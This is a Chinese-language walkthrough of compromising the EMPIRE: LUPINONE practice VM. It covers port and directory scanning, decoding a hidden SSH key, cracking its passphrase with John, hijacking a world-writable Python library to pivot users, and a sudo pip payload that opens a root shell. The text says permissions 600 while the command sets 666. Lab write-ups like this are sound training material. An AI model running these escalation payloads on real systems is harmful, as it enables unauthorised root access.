EMPIRE: LUPINONE靶机渗透过程

准备环境

攻击机：WSL-Kali-Linux
目标靶机：EMPIRE: LUPINONE
平台：VMware Workstation 16.2
靶机为NAT模式

一、信息搜集

1.主机嗅探

靶机启动完成已显示其IP地址

IP：192.168.9.133

2.端口扫描

一把梭

nmap -A -p- 192.168.9.133

靶机开放端口情况如下：

3.目录扫描

先访问其网页

发现就只有一张图片，无可用信息，在kali里面进行目录扫描

dirsearch -u 192.168.9.133

发现目录下有robots.txt文件，对其进行访问

有个名为~myfiles的文件，访问试试看

发现是个404页面，但是有句注释是Your can do it, keep trying.

应该是在暗示该网站还存在其他的类似于~myfiles的文件，使用wfuzz进行目录模糊扫描

wfuzz -c -u '192.168.9.133/~FUZZ' -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --hc 404

通过模糊搜索，发现目录下还存在一个名为~secret的文件，查看该文件

文中提示有ssh私钥文件藏在这里，还有一个用户名icex64

使用ffuf工具扫描

ffuf -u "http://192.168.9.133/~secret/.FUZZ" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .pub,.txt,.html -mc 200

发现在~secret目录下存在.mysecret.txt文件，查看该文件

通过尝试，发现这是base58编码，解码一下

解码后是私钥文件

二、漏洞利用

1.SSH登录

将解密之后的私钥写入文件，并赋权600给该文件

chmod 666 private
/usr/share/john/ssh2john.py private > q.txt

使用ssh2john.py生成密码

john --wordlist=/usr/share/wordlists/fasttrack.txt q.txt

爆破出密码为P@55w0rd!

可结合刚才的用户名icex64进行ssh登录

成功登录icex64用户，并且发现用户icex64能免密执行python3.9和位于arsene家目录下的heist.py文件

2.代码审计

查看arsene家目录

ls /home/arsene -lha

有个heist.py和note.txt

查看heist.py和note.txt的内容

heist.py中引用了webbrowser库，note.txt中大概讲解arsene想请icex64帮忙检查一下heist.py中的代码是否安全

查找webbrowser库的所在路径

find /usr/ -name webbrowser.py

位于/usr/lib/python3.9/路径下，查看webbrowser.py的权限

ls /usr/lib/python3.9/webbrowser.py -l

皆大欢喜，777权限，可以在里面写入shell

nano /usr/lib/python3.9/webbrowser.py

写入os.system("/bin/bash")

3.用户渗透

以arsene用户的身份运行heist.py

sudo -u arsene python3.9 /home/arsene/heist.py

成功拿到arsene用户，查看其权限

sudo -l

4.提权

能以root权限执行pip，可以进行pip提权

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

回到root家目录并查看文件列表

cd ~
ls -lha

发现有个root.txt文件，查看该文件

目标靶机已完成渗透